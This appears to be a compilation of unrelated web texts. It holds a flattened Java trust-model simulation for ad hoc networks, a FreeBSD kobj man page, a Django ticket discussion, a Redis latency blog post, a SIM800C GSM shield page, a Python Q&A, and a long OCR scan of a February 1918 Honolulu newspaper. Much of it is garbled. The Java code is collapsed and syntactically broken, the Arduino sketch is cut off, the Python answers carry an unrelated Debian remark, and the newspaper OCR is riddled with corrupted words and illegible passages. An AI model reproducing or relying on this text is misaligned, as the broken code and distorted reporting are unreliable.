{ one = rand.nextInt(s); two = rand.nextInt(s); interacted = false; if (one != two) { trials++; if (!defenseless) { interacted = net[one].interactAndUpdateTrust(net[two], net); // if(net[two].isMal()) // System.out.println("trust updated: " + one + " " + two + // " trust " + net[one].getRecomendation(net[two])); } else { interacted = net[one].interact(net[two]); // System.out.println("interacted."); for (x = 0; x < s; x++) { bool = true; for (y = 0; y < s; y++) { if (y != x && !net[y].isMal()) { if (net[y].getRecomendation(net[x]) < node .getTacc()) { bool = bool & true; } else bool = false; 46 if (bool) { if (Arrays.binarySearch(mali, x) < 0) { mali[l] = x; l++; if (net[x].isMal()) { k++; Arrays.sort(mali); z++; // ************************************************************ // Trust Change Test // ************************************************************ if (mode == '-' && oscMode != 'm' && oscMode != 'h') { avgTrustMal = 0; if (two == testingNodeMal) { for (j = 0; j < s; j++) { if (j != testingNodeMal && !net[j].isMal()) avgTrustMal += net[j] .getRecomendation(net[testingNodeMal]); avgTrustMal /= (s - malicious); out.write(avgTrustMal + "\n"); } else if (oscMode == 'm') { int num = 0; for (i = 0; i < s; i++) { if (net[i].isOsMal()) { num = 0; avgTrustMal = 0; for (j = 0; j < s; j++) { if (!net[j].isOsMal() && !net[j].isMal()) { avgTrustMal += net[j] .getRecomendation(net[i]); num++; avgTrustMal /= num; if (two == testingNodeMal) out.write(inter + "\t" + avgTrustMal + "\n"); if (avgTrustMal >= 0.8) net[i].setMal(); } else if (oscMode == 'h') { int num = 0; k = 0; for (i = 0; i < s; i++) { if (net[i].isOsHon()) { num = 0; avgTrustMal = 0; for (j = 0; j < s; j++) { if (!net[j].isOsHon() && !net[j].isMal()) { avgTrustMal += net[j] .getRecomendation(net[i]); num++; 47 avgTrustMal /= num; if (two == testingNodeMal) out.write(inter + "\t" + avgTrustMal + "\n"); if (avgTrustMal < 0.3) net[i].unSetMal(); if (avgTrustMal > 0.7 && !net[i].isMal()) z = max + 1; if 
(interacted && net[two].isMal()) { // System.out.print(i++ + "\r"); inter++; /* * check for false positives */ //System.out.println("Number of iterations untill detection: " + // inter); System.out.println("malisous nodes detected: "); try { for (j = 0; j < s; j++) { System.out.print(mali[j] + " "); if (mali[j] < s) { if (!net[mali[j]].isMal()) falsePositive++; } catch (ArrayIndexOutOfBoundsException e) { System.out.println("error"); System.out.println(e.getMessage()); // return max; return inter; function to fill an array of type double with values between start end and incremented by step @param start @param end @param step @return array */ public static double[] generateArray(double start, double end, double step){ double[] array; int i = 0; int size = (int) ((end - start) / step) + 1; array = new double[size]; 48 array[0] = start; for (i = 1; i < size; i++) array[i] = array[i - 1] + step; return array; function to fill an array of type int with values between start and end and incremented by step */ public static int[] generateArray(int start, int end, int step) { int[] array; int i = 0; int size = (end - start) / step + 1; array = new int[size]; public static void main(String[] args) { if (args.length != 13) { System.err .println("Specify args: fileName #nodes, #malicious, " + "alpha, Tacc, delta, iteration, mode, " + "IDS error rate, lying Model, lying distance " + "value, penalize"); System.err .println("----------------------------------------------"); System.err.println("Modes: a \tfix all and change alpha"); System.err.println(" System.err t \tfix all and change Tacc"); n \tfix all and change number of nodes"); .println(" m \tfix all and change number of " + "malicious nodes"); System.err d \tfix all and change distance from " + "Tacc for initializing PIE"); i \tfix all and change IDS error rate"); - \tfix all"); .println("-----------------------------------------------"); .println("Lying Modes: r \tmalicious nodes give random" + " recommendations"); 
System.err d \tmalicious nodes give " + "Tacc+distance to other malicious " + "nodes\n\t\tand Tacc-distance to Honest nodes"); 49 n \tno lying"); .println("\nif you want to take advice from all nodes" + " set advice_all to 1\nif you want it from" + trusted nodes only set it to 0"); .println("\nif you want to penalize nodes that give high" + " trust for malicious\npeers set penalize to" + " 1 if you don't set it to 0"); } else if (args.length == 13) { try { network Net = new network(args[0], Integer.parseInt(args[1]), Integer.parseInt(args[2]), Double.parseDouble(args[3]), Double.parseDouble(args[4]), Double .parseDouble(args[5]), Integer .parseInt(args[6]), args[7].charAt(0), Double .parseDouble(args[8]), args[9].charAt(0), Double.parseDouble(args[10]), args[11].equals("1"), args[12].equals("1"), args[13].charAt(0), Integer .parseInt(args[14])); } catch (IOException e) { e.printStackTrace(); Class Main import java.awt.BorderLayout; import java.awt.Dimension; import java.awt.Font; import java.awt.Rectangle; import java.awt.event.ActionEvent; import java.io.IOException; import javax.swing.ButtonGroup; import javax.swing.JButton; import javax.swing.JCheckBox; import javax.swing.JFrame; import javax.swing.JLabel; import javax.swing.JPanel; import javax.swing.JProgress.
https://de.scribd.com/document/125471561/TRUST-MODEL-FOR-AD-HOC-NETWORKS
NAME kobj - a kernel object system for FreeBSD SYNOPSIS #include <sys/param.h> #include <sys/kobj.h> void kobj_class_compile(kobj_class_t cls); void kobj_class_compile_static(kobj_class_t cls, kobj_ops_t ops); void kobj_class_free(kobj_class_t cls); kobj_t kobj_create(kobj_class_t cls, struct malloc_type *mtype, int mflags); void kobj_init(kobj_t obj, kobj_class_t cls); void kobj_delete(kobj_t obj, struct malloc_type *mtype); DEFINE_CLASS(name, kobj_method_t *methods, size_t size); DESCRIPTION The kernel object system implements an object-oriented programming system in the FreeBSD kernel. The system is based around the concepts of interfaces, which are descriptions of sets of methods; classes, which are lists of functions implementing certain methods from those interfaces; and objects, which combine a class with a structure in memory. Methods are called using a dynamic method dispatching algorithm which is designed to allow new interfaces and classes to be introduced into the system at runtime. The method dispatch algorithm is designed to be both fast and robust and is only slightly more expensive than a direct function call, making kernel objects suitable for performance-critical algorithms. Suitable uses for kernel objects are any algorithms which need some kind of polymorphism (i.e., many different objects which can be treated in a uniform way). The common behaviour of the objects is described by a suitable interface and each different type of object is implemented by a suitable class. The simplest way to create a kernel object is to call kobj_create() with a suitable class, malloc type and flags (see malloc(9) for a description of the malloc type and flags). This will allocate memory for the object based on the object size specified by the class and initialise it by zeroing the memory and installing a pointer to the class’ method dispatch table. Objects created in this way should be freed by calling kobj_delete(). 
Clients which would like to manage the allocation of memory themselves should call kobj_init() with a pointer to the memory for the object and the class which implements it. It is also possible to use kobj_init() to change the class for an object. This should be done with care as the classes must agree on the layout of the object. The device framework uses this feature to associate drivers with devices. The functions kobj_class_compile(), kobj_class_compile_static() and kobj_class_free() are used to process a class description to make method dispatching efficient. A client should not normally need to call these since a class will automatically be compiled the first time it is used. If a class is to be used before malloc(9) is initialised, then kobj_class_compile_static() should be called with the class and a pointer to a statically allocated kobj_ops structure before the class is used to initialise any objects. To define a class, first define a simple array of kobj_method_t. Each method which the class implements should be entered into the table using the macro KOBJMETHOD() which takes the name of the method (including its interface) and a pointer to a function which implements it. The table should be terminated with two zeros. The macro DEFINE_CLASS() can then be used to initialise a kobj_class_t structure. The size argument to DEFINE_CLASS() specifies how much memory should be allocated for each object. HISTORY Some of the concepts for this interface appeared in the device framework used for the alpha port of FreeBSD 3.0 and more widely in FreeBSD 4.0. AUTHORS This manual page was written by Doug Rabson.
http://manpages.ubuntu.com/manpages/intrepid/man9/kobj_class_free.9freebsd.html
Opened 6 years ago Closed 6 years ago Last modified 6 years ago #17953 closed Cleanup/optimization (invalid) DB architecture in tutorial Description Hi, on page: you create the DB architecture with this code: from django.db import models class Poll(models.Model): question = models.CharField(max_length=200) pub_date = models.DateTimeField('date published') class Choice(models.Model): poll = models.ForeignKey(Poll) choice = models.CharField(max_length=200) votes = models.IntegerField() and I think in a clean architecture it should be: from django.db import models class Poll(models.Model): question = models.CharField(max_length=200) pub_date = models.DateTimeField('date published') class Choice(models.Model): choice = models.CharField(max_length=200) votes = models.IntegerField() class ChoiceToPollRelation(models.Model): poll = models.ForeignKey(Poll) choice = models.ForeignKey(Choice) In this way, you are leading beginners to make errors from the start. Change History (2) comment:1 Changed 6 years ago by comment:2 Changed 6 years ago by Thanks for the quick reply. Perhaps I've been too quick to open the ticket and my "statements" ("you are leading beginners..." and so on) were offensive. Sorry. It should have been a humble question. ;-) I have to think about it more to make it clear to myself. Thank you once more. There's nothing wrong with a foreign key; it reflects that each choice can be related to one and exactly one poll (a one-to-many relationship). Your proposal is to change it to a many-to-many relationship, which is also fine if you need a single choice to be able to appear in multiple polls, but it's not better or cleaner (in fact it's worse if you want to enforce the one-to-many nature of the relationship). If we were to use a many-to-many relationship here, the correct way to do that in Django would be to use a ManyToManyField, not a separate join model (given that there's no extra data about the relationship being stored). 
But there's no reason to complicate the tutorial by using a ManyToManyField when a ForeignKey meets the need.
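To see the difference concretely, here is a minimal plain-Python sketch (not Django; the class and attribute names are illustrative stand-ins) of why a foreign key enforces the one-to-many shape while a separate join table does not:

```python
# A "foreign key" is a single reference slot on the child row, so each
# Choice belongs to exactly one Poll (one-to-many, enforced by structure).
class Poll:
    def __init__(self, question):
        self.question = question

class Choice:
    def __init__(self, poll, choice):
        self.poll = poll      # one and exactly one poll, like a ForeignKey
        self.choice = choice

# A separate relation table, by contrast, lets the same choice appear in
# many polls (many-to-many) unless you add extra constraints yourself.
relations = []  # list of (poll, choice) pairs, like the proposed join model

p1, p2 = Poll("Poll 1"), Poll("Poll 2")
c = Choice(p1, "Yes")        # FK-style: c.poll can only ever be one poll
relations.append((p1, c))
relations.append((p2, c))    # join-model-style: nothing stops reuse
print(len(relations))        # → 2: the one-to-many rule is not enforced
```

In Django itself, the structural equivalent of that join table is a ManyToManyField, which is why the maintainer's reply points there rather than at a hand-rolled relation model.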
https://code.djangoproject.com/ticket/17953
Redis is blazing fast and can easily handle hundreds of thousands to millions of operations per second (of course, YMMV depending on your setup), but there are cases in which you may feel that it is underperforming. This slowness of operations – or latency – can be caused by a variety of things, but once you’ve ruled out the usual suspects (i.e. the server’s hardware/virtualware, storage and network) you should also examine your Redis settings to see what can be optimized.

A good place to start is by verifying that the CPU of your Redis server is indeed working at full throttle and not blocked somehow. If your Redis process is at a stable 100%, then your issue may be attributed to one or both of two things: your volume of queries and/or slow queries. The optimization of slow-running queries (and in most cases the underlying data structures) is an art in itself, but there are still quite a few things that you can try before turning to other measures like upgrading your hardware or clustering Redis.

Review your Redis SLOWLOG to ensure that there aren’t any particularly slow queries in it – these should be easily identifiable by their high execution times (the third integer in each log entry). Higher execution times mean higher latency, but remember that some of Redis’ commands (such as Sorted Set operations) can take longer to complete, depending on their arguments and the size of data that they process. By using Redis Cloud’s enhanced version of the SLOWLOG or doing the math in your head, you can further drill down to identify the troublemakers.

Next, take a look at the output of the INFO ALL command. Use your experience, keen judgment and cold logic to answer this question – does anything look weird? 🙂 When not tracking persistent storage, networking or replication bottlenecks, you should focus on the stats and commandstats sections. 
When the value of your total_connections_received in the stats section is absurdly high, it usually means that your application is opening and closing a connection for every request it makes. Opening a connection is an expensive operation that adds to both client and server latency. To rectify this, consult your Redis client’s documentation and configure it to use persistent connections. Use the information in the commandstats section to hone in on the commands that occupy most of your server’s resources. Look for easy kills by replacing commands with their variadic counterparts. Some of Redis’ commands (e.g. GET, SET, HGET & HSET) sport a variadic version (i.e. MGET, MSET, HMGET & HMSET, respectively), whereas others have infinite arity built right into them (DEL, HDEL, LPUSH, SADD, ZADD, etc). By replacing multiple calls to the same command with a single call, you’ll be shaving off precious microseconds, while saving on both server and client resources. If you’re managing big data structures in your Redis database and you’re fetching all their content (using HGETALL, SMEMBERS or ZRANGE, for example), consider using the respective SCAN command instead. SCAN iterates through the Redis keys’ namespace and should always be used instead of the “evil” KEYS command. As an added bonus, SCAN’s variants for Hashes, Sets and Sorted Sets (HSCAN, SSCAN and ZSCAN) can also help you free up Redis just enough to reduce overall latencies. Another way to reduce the latency of Redis queries is by using pipelining. When you pipeline a group of operations, they are sent in a single batch that, while bigger and slower to process, requires only a single request-response round trip. This consolidation of trips makes for substantial overall latency reductions. 
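The saving from variadic commands is easy to see with a toy model (a sketch, not the real redis client; `RoundTripCounter` is a made-up stand-in that only counts simulated request-response trips):

```python
# Toy model: each method call stands for one client-server round trip.
class RoundTripCounter:
    def __init__(self, data):
        self.data = dict(data)
        self.trips = 0

    def get(self, key):
        # one GET = one round trip
        self.trips += 1
        return self.data.get(key)

    def mget(self, *keys):
        # one MGET = one round trip, no matter how many keys it carries
        self.trips += 1
        return [self.data.get(k) for k in keys]

r = RoundTripCounter({"a": 1, "b": 2, "c": 3})
naive = [r.get(k) for k in ("a", "b", "c")]   # 3 round trips
trips_naive = r.trips
batched = r.mget("a", "b", "c")               # 1 round trip, same result
print(trips_naive, r.trips - trips_naive)     # → 3 1
```

Against a real server, each avoided round trip saves a full network RTT, which is where the microseconds come from.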
Note, however, that a pipeline operation could block your application if it is waiting for replies without sending the pipeline – Redis will provide all of the replies to the pipelined stream of commands only after the pipeline has been sent. Also bear in mind that when using pipelining, Redis caches all the responses in memory before returning them to the client in bulk, so pipelining thousands of queries (especially those that return a large amount of data) can be taxing to both the server and client. If that is the case, use smaller pipeline sizes.

When pipelining isn’t an option, you can still save big time on round-trip time (RTT) latency by taking the “moonlit” scripting road. With Lua scripting in Redis, you can use logic that interacts with the data locally, thus saving many potential client-server round trips. To further reduce bandwidth consumption, latency, and to avoid script recompilations, make sure to use SCRIPT LOAD and EVALSHA.

Lua Tips: Refrain from generating dynamic scripts, which can cause your Lua cache to grow and get out of control. If you have to use dynamic scripting, then just use plain EVAL, as there’s no point in loading them first. Also, remember to track your Lua memory consumption and flush the cache periodically with a SCRIPT FLUSH. Also, do not hardcode and/or programmatically generate key names in your Lua scripts, because doing so will render them useless in a clustered Redis setup.

These are just some of the ways that you can easily get more out of your Redis database without bringing in the heavy artillery. Adopting even one of these suggestions can make a world of difference and lower your latency substantially. Know more tricks of the trade? Have any questions or feedback? Feel free to shout at me, I’m highly available 🙂
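The round-trip saving (and the bulk-reply behavior described above) can be sketched the same way – again a toy stand-in, not redis-py; the point is only that N buffered commands cost one simulated trip when flushed:

```python
class ToyPipeline:
    """Buffers commands and 'sends' them in one simulated round trip."""
    def __init__(self):
        self.buffer = []
        self.round_trips = 0

    def set(self, key, value):
        # nothing is sent yet; the command is only queued
        self.buffer.append(("SET", key, value))
        return self  # chainable, like real pipeline clients

    def execute(self):
        # one round trip for the whole batch; replies come back in bulk,
        # which is why huge pipelines are memory-hungry on both ends
        self.round_trips += 1
        replies = ["OK" for _ in self.buffer]
        self.buffer.clear()
        return replies

pipe = ToyPipeline()
for i in range(1000):
    pipe.set("key:%d" % i, i)
replies = pipe.execute()
print(pipe.round_trips, len(replies))   # → 1 1000
```

With a real client, the same 1000 SETs issued one by one would pay 1000 RTTs; splitting the work into a few moderately sized pipelines is the usual compromise between latency and reply-buffer memory.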
https://redis.com/blog/redis-running-slowly-heres-what-you-can-do-about-it/
Introduction This is a GPRS / GSM Arduino expansion board developed by Keyes. It is a shield module with frequencies of EGSM 900MHz / DCS 1800MHz and GSM 850MHz / PCS 1900MHz, integrated with GPRS, DTMF and other functions. It supports DTMF: when the DTMF function is enabled, you can get character feedback from the buttons pressed during a call, which can be used for remote control. It is controlled by AT commands; you can drive its functions directly through the computer serial port or the Arduino motherboard. The SIM800C GPRS Shield board has a built-in SIM800H chip with good stability. Specification - Power Supply <Vin>: 6-12V - Low power consumption mode: current is 0.7mA in sleep mode - Low battery consumption (100mA @ 7V, GSM mode) - GSM 850/900/1800/1900MHz - GPRS multi-slot class 1~12 - GPRS mobile station class B - GSM phase 2/2+ standard - Class 4 (2W @ 850/900MHz) - Class 1 (1W @ 1800/1900MHz) - Controlled via AT commands - USB / Arduino control switch - Adaptation of serial baud rate - Support DTMF - LED indicators display power supply status, network status and operating mode Sample Code

#include <sim800cmd.h>

//initialize the library instance
//fundebug is an application callback function, invoked when someon[...]
[...sketch text missing from the source...]
  ;");  //input the dial telephone number
  while(1);
}

  digitalWrite(13, HIGH);  //turn the LED on by making the voltage HIGH
  delay(500);
  digitalWrite(13, LOW);   //turn the LED off by making the voltage LOW
  delay(500);
}

//application callback function
void fundebug(void)
{
}

Note As of Arduino IDE 1.0 and subsequent versions, WProgram.h has been renamed Arduino.h, so this program requires Arduino IDE 1.0 or later; overwrite the original file. If your IDE is newer than version 1.5.5, copy the HardwareSerial.h file into Arduino\hardware\arduino\sam\cores\arduino, overwriting the existing one, then open the HardwareSerial.h file and make the same modification. 
Test Result Burn the code onto the Keyestudio UNO R3 development board, stack the expansion board on the Keyestudio UNO R3 development board, then connect the phone card (2G network only) and a headphone to the expansion board. Once powered on, it can dial the phone number 15912345678, and you can talk through the headset after the call is connected. Related Data Link Get the Libraries of Hardware Get the Libraries of SIM800C
https://www.arduinoposlovensky.sk/produkty/arduino/shield/sim800c-gprs-gsm-shield-for-arduino-uno-r3-and-mega2560/
TypeError: unsupported operand type(s) for %: 'range' and 'int'

Write a Python program to find numbers between 120 and 200 which are divisible by 7 and multiples of 5 without using a "for loop". I tried to work it out this way:

x = range(120, 200)
if x % 7 == 0 and x % 5 == 0:
    print(x)

But instead I get this error. What could I be missing?

Traceback (most recent call last):
  File "C:\Users\User\Desktop\skillshare-code\if else statements\4.py", line 11, in <module>
    if x % 7 == 0 and x % 5 == 0:
TypeError: unsupported operand type(s) for %: 'range' and 'int'

Since you're not allowed to use the for construct, you can accomplish this with the filter method:

valid_nums = filter(lambda x: x % 35 == 0, range(120, 200))

Note that the problem is not asking you to print the numbers but rather to "find" them, which means to create some form of list or collection of the valid values.

PS: I did x % 35 == 0 because "divisible by" and "multiples of" mean the same thing, so 35 comes from 7 * 5.

PPS: filter returns a filter object, which is a generator. You will need to convert that to a list if you want to view the list, by doing list(valid_nums). You don't need to do the conversion if you just need to iterate through the values and use them for something else, since the generator works just fine for that. 
I think using a list comprehension is more idiomatic for Python than filter (of course, if you are allowed):

x = range(120, 200)
valid_nums = [num for num in x if num % 35 == 0]

Or at creation:

valid_nums = [num for num in range(120, 200) if num % 35 == 0]

What you are trying to do is define x as a range of numbers, but you will still have to go through every number to check it. Since a "for loop" is not allowed, you can use a while loop or call a function recursively, starting from the lower limit until the passed parameter hits the upper limit:

def func(x):
    if (condition satisfied):
        print(x)
    if x < upper_limit:
        func(x + 1)
    return
One way of reading the challenge is to find all the numbers in a range that are divisible by 7 but not by 5. That's very different from simply reducing the problem to x % 35. Still, creating a list comprehension is the answer. Here is what worked for me:

x = range(2000, 3201)
num = [n for n in x if n % 7 == 0 and n % 5 != 0]

Once this is done, simply print(num) and you have your answers. 
For python, the plus “+” is used to add two numbers as well as two strings. In this instance, this is almost certainly Debian/Ubuntu's problem and not ours: you appear to be using Debian/Ubuntu's packages. That means you need to follow up with Debian/Ubuntu in the first case, as they maintain several patches and are responsible for supporting those packages in their system. - You need to loop through all the values in xbut you're not allowed to use the forconstruct - "What could I be missing out?" %only works on single numbers, you're trying to use it on a range of numbers. - Most operations don't automatically loop themselves if you give them an iterable object. - "which are divisible by 7 and multiples of 5": your teacher has a sense of humour (and mindscrew :)) - @Jean-FrançoisFabre I was staring at that for so long thinking, does he just mean 35? haha - that's probably what the (evil) teacher had in mind. You could explain the 35, and also note that filterneeds to be iterated upon (wrapping it to listfor instance) in python 3 else it just returns a generator. - but it uses a forloop inside the list comprehension. - @Jean-FrançoisFabre Not a Python for loop. Internally filter also uses loop.
http://thetopsites.net/article/50432564.shtml
LATEST CABLED SUGAR QUOTATIONS — 96° Centrifugals: [price table illegible]

HONOLULU, HAWAII TERRITORY, TUESDAY, FEBRUARY 19, 1918 — SEMI-WEEKLY. Whole Number 4714.

Bloody Internecine Strife Goes Steadily Forward and Streets of Several Cities Run Deep With Blood of Countrymen

POLISH FORCES ROUTED IN MINSK ENGAGEMENT

Bolshevik Leaders Continue Their Plans To Secure Control of All-Russia Even If It Be Lost Later To Huns

LONDON, February 18 (Associated Press) — Bolshevik leaders, despite the resumption of war by Germany, appear to be directing their attention to internal disorder and to be pushing forward their intention to hold sway over All-Russia, even though it may be taken from them by the Prussian invaders, who have already crossed the Dvina. Ignoring danger from without, they are pressing forward deeper into civil warfare, and Russia is riven deeply with the civil, chaotic and internecine slaughter now prevalent.

POLES ROUTED

Despatches from Petrograd late last night told of severe defeats administered by the Bolshevik forces against those of the Polish anti-revolutionists near Minsk. There the Sixth Polish Army Division was defeated with heavy casualties. It is said one detachment of the Polish forces was completely annihilated.

The national council, with Lenine at its head, has given orders to Bolshevik commanders to seize a number of cities and to quell opposition to the rule of the council. The result has been bloody street fighting in these cities and their suburbs, and in some instances severe engagements in the open country. Petrograd reports are almost entirely of Bolshevik successes.

KIEV TAKEN

From Kiev it was reported that after eight days of hard fighting the Bolshevik troops have succeeded in capturing that city. A regular siege was laid by the attackers, and while besieging the city the Bolshevik aviators dropped many bombs upon the inhabitants.

The casualties are estimated at 4000 killed and 7000 wounded. Dead by the hundreds still fill the streets, many women and children having been slain.

A battle in Odessa took place on Monday between the Bolsheviki supporters and the "moderates", most of whom, particularly outside Petrograd, still decline to recognize the Bolshevik regime. The Bolsheviki bombarded Odessa, doing great damage.

In some districts the Poles have defeated the Bolsheviki and killed large numbers. Other Poles are advancing against Smolensk, now held by a Bolshevik garrison.

SCHROEDER IS SENTENCED

Confessed Conspirator Escapes Term in Penitentiary As Result of His Having Turned State's Evidence Against His Co-Defendants

In consideration of the fact that Heinrich August Schroeder turned state's evidence against his fellow conspirators and told the jury which is trying the Hindu Revolution Conspiracy Case what he knew about the conspiracy and the part which he, George Rodiek and others played in the Hawaiian end of the conspiracy, he has been permitted by a federal judge to escape with no other penalty than the inconsequential fine of $1000. No prison sentence was imposed upon him.

An Associated Press despatch received last night said: "Schroeder sentenced. One thousand dollars."

Considering the fact that George Rodiek, his superior, was fined $10,000 and likewise escaped a prison sentence, the penalty inflicted upon Schroeder may be commensurate, and it may be that the judge considered Schroeder guilty as an employe and not as a principal.

Conspiracy Charged

Heinrich August Schroeder, former clerk of H. Hackfeld & Co. during the Rodiek regime and successor to Rodiek as representative of Germany here after the resignation of the latter on February 5, 1915, was indicted with Rodiek and forty others on charges of conspiracy to violate the neutrality of the United States, the specific accusation being that the defendants conspired to foment an uprising against British rule in India for the purpose of embarrassing the British Government in Europe. In all, ninety-eight indictments were returned, but fifty-six defendants were beyond the reach of United States authorities.

Surrendered Himself

Word of the indictment of Rodiek and Schroeder reached Honolulu and created much excitement. At the time of the indictment Rodiek was on his way to the Coast but Schroeder was here. He was not arrested at the time, but following the publication in The Advertiser on July 2 that an order for his arrest had been issued by federal officials in San Francisco, and an order had been sent to the federal authorities here to arrest him and send him to San Francisco for trial as soon as might be, he surrendered himself at ten o'clock that morning and was held in $10,000 bail, the same amount that Rodiek furnished as surety in San Francisco. It developed the reason no warrant had been served on Schroeder was the message from San Francisco directing the arrest of "J. P. Schroeder", and the delay was to secure more explicit instructions.

Schroeder left here for San Francisco to stand trial on August 9, and on August 27 the trial of the German reservists was set for October 30. The trial of thirty-seven of the defendants did not start, however, until November 20. The indictments against five of the original forty-two were dismissed.

Plead Guilty

It was on December 5 the big surprise came, when Rodiek and Schroeder pleaded guilty, at the same time making statements to the prosecutor in extenuation of the offences with which they were charged. At that time United States Attorney Preston intimated he would recommend that the court give consideration to the statements of the two defendants and extend clemency provided they gave the evidence required of them.

In their written statements to the United States attorney, Rodiek and Schroeder claimed that insofar as their connection with the Maverick went, their offenses consisted merely of having furnished supplies for that vessel while she was lying at Hilo and partook only of the nature of a commercial transaction. In his testimony later, however, Schroeder went further and told of the chartering of a sampan to carry coded messages and provisions to the Maverick from San Francisco. The transmission of orders through them to the commander of the Maverick occurred in April and May, 1915, and the extenuation plea that this was before the United States was involved in the war was presented.

They asked the acceptance of their statements in the spirit of fairness to themselves and to their American friends in Honolulu. Speaking for Schroeder as well as himself, Rodiek alleged that when the war broke out in 1914 he was advised by counsel that it was not inconsistent for him to act as German consul. Whatever they did, he claimed, was purely commercial in nature.

On December 23 Rodiek was sentenced to pay a fine of $10,000, the court giving its reasons at the time for the fine and no prison sentence. At that time sentence upon Schroeder was deferred, and from time to time has been postponed until yesterday.

Forecast Correct

Reports from San Francisco received January 8 last said the former Honolulan might turn state's evidence to avoid a penitentiary sentence.

(Continued on Page 2, Column 1)

[Photo:] HEINRICH AUGUST SCHROEDER.

GENERAL SIBLEY'S CAREER IS ENDED

Former Commander In Philippines Passes Away at Camp Grant

February 18 (Associated Press) — Brig.-Gen. Frederick W. Sibley, U. S. A., retired, veteran of the Philippine campaigns, died at Camp Grant yesterday from pernicious anemia. He had been taken to the base hospital a week ago from the Mayo Sanitarium, where he had been undergoing treatment.

General Sibley was sixty-six years old, a native of Texas. His father was Gen. C. C. Sibley. He was assigned to the cavalry on graduation from West Point, serving in a number of regiments, including the Fourth Cavalry, in which he was lieutenant-colonel in 1900. He was one of General Crook's officers against the Sioux and Cheyenne, being brevetted for gallantry in action after the battle of the Little Big Horn, and later for distinguished gallantry in action against Crazy Horse, Powder River, Montana.

During the war with Spain he was in command of the headquarters guard of the Fourth Army Corps and was later adjutant general of the Department of Luzon. In command of the Second Cavalry he later suppressed the ladrones of Cavite and Batangas. From 1906 to 1911 he was commandant of the Military Academy.

General Sibley was the father of Mrs. Phalen, wife of Col. James Phalen, division sanitary inspector of Camp Grant, and of Mrs. Christian, wife of Colonel Christian of the Signal Corps. Both daughters and his wife were with him when he died.

ISHII TO BE AMBASSADOR

Announcement Made In Washington That Head of Recent Mission Will Be Named

WASHINGTON, February 18 (Associated Press) — Viscount Ishii, head of the Japanese diplomatic mission which recently visited the United States, will soon represent his country at Washington. Announcement was made at the state department today that Tokio has officially informed the United States that Ishii has been appointed ambassador to the United States.

Viscount Aimaro Sato, present ambassador, will be placed on the unassigned roll of diplomatic representatives in Tokio.

Viscount Ishii is 51 years old. He has been Japan's foreign minister and ambassador to France. His work as head of the Ishii mission is generally regarded as superb. It was criticized only by the extremists in his own country. The mission was splendidly received in the United States and its work with the state department resulted in the now famous Lansing-Ishii agreement already in operation, which is declared to have settled the Far Eastern question and brought a better understanding between the Orient and the Occident than has existed for more than a decade.

Mexican President Reported Unable To Form Cabinet; Treats Secretly With Rebels

LAREDO, Tex., February 18 (Associated Press) — Difficulty in forming a new cabinet, and secret negotiations with the rebel chieftains who revolted in December, Luis Gutierrez and Francisco Coss, are said to be the reasons for President Carranza's prolonged absence from Mexico City, which he left December 27, according to travelers who arrived here from Mexico City. They stated that when they left the capital the negotiations with the rebels had produced no results, and that the president had gathered about him at Pachuca, where he made his headquarters, nearly 4000 troops.

The cabinet tangle, they added, was complicated by the demands of General Pablo Gonzalez, who was understood to have been selected by the president to head the new cabinet as minister of gobernacion and who is reported to have refused to serve unless the German Minister H. von Eckardt were given his passports and unless various other men, notably Luis Cabrera and Rafael Nieto, acting secretary of Hacienda, be given no voice or place in the government. General Gonzalez some months ago issued a public statement in favor of the entente Allies.

GERMAN KULTUR IS RAINED ON LONDON

Two Ruthless Raids Give Casualty List of Sixty-eight; Many Children Hurt

LONDON, February 19 (Associated Press) — Casualties from the Hun air raids of Saturday and Sunday night proved heavier than was at first reported. Early reports indicated the damage to life and property on Saturday night was insignificant, but full reports from the other cities which were attacked by the raiders told a different story, and another chapter was added to the history of German kultur.

War office reports of yesterday gave the total casualties of the Saturday night raid as eleven killed and four injured, and of Sunday night sixteen killed and thirty-seven wounded, a total for the two raids of twenty-seven dead and forty-one injured, many of them women and children.

Losses to the enemy fleet are reported, but the war office in its communique does not give specific details.

GENERAL ROBERTSON

LONDON, February 18 (Associated Press) — General Robertson, who retired as chief of staff through his resignation of that position, has accepted the important command of the British forces in Eastern England. While the duties are not such as fall upon the commanders of the battle fronts, they are none the less important in the general conduct of the war.

BRITISH POLICY NOT DISTURBED THROUGH ADMIRALTY CHANGES

Announcement of Admiralty Board's Personnel Sets At Rest Much Speculation and Is Without Sensation

LONDON, February 12 (Associated Press) — Speculation in certain quarters as to any disturbance of the main lines of British naval policy has been dissipated with the announcement of the composition of the new board of admiralty. The list, which appeared in the London Gazette, is as follows:

Sir Eric G. Geddes, First Lord.
Acting Admiral Sir R. E. Wemyss, First Sea Lord and Chief of Naval Staff.
Vice-Admiral Sir H. Heath, Second Sea Lord.
Rear-Admiral L. Halsey, Third Sea Lord.
Rear-Admiral H. H. D. Tothill, Fourth Sea Lord.
Rear-Admiral S. Fremantle, Deputy Chief of Staff.
Rear-Admiral Sir A. L. Duff, Assistant Chief of Staff.
E. G. Pretyman, Civil Lord.
Rear-Admiral G. F. W. Hope, Deputy First Sea Lord.
Sir Alan G. Anderson, Controller.
Sir Arthur T. Pease, Second Civil Lord.

"There is nothing sensational or dramatic in the list of names," says the Daily Telegraph. "The statement will set at rest any fear that a violent change in the main lines of naval policy is contemplated. There is only one member of the new board who was not serving at the admiralty when Sir John Jellicoe was in office, and that one exception is Rear-Admiral Sydney Fremantle.

Wemyss Advanced

"For the rest, Sir Rosslyn Wemyss steps up, already announced, from Deputy First Sea Lord to First Sea Lord, and is succeeded by Rear-Admiral George Hope, who for some time has headed a division of the Naval Staff."
'in Wbiclt position, be. ss done eoiisupleu aits :rvic. ' ' .-.,': w. ..$ ,i v.-. -. -.. "The second; third,' and fburth-aea lords, " responsible fori personnel, ma terlal and annplie. respectively; retnin their seat,, but the petition of 4fth sea lord revpaitsible fo aerial polic,v, is abolished iff view 'of j the creation of the air council. ... t;. r row Eerviceo '.'v f ; I '; ".It 'mny be recnlled- that the naval member f . )he iormer , board ,who me to Whitehall n year ago nnd still remain bad all - nerved in the irrand j fleet sine, the opening i the war, and that Admiral Fremantle, who belongs to a naval family with .high traditions. Iiaa been employed in n variety .' of i-nheres In the North He, aa well as in Hoot hern waters, and , everywhere with snceese. He rcturas U the admir ilt r with the advantage', .of havinc nerved on the naval staff la tha early dav of the .war. ,' ' . v ...' . ti'f , . "Conseqnently there la nothing In the eouatitntion of the tonr4 to under mine public'. eonSdenea or to anggest that there is any Intention to embark upon any anck . adyentnrea with the Brand fleet as Sir Erie Oedde referred to in hi speech of November." : r. Hir Krie . Geddes, in a epeeeh in the bouse of common on "November !,'. plsined why he did not regard s feas ibln- the suggestion v that the"' British era ad 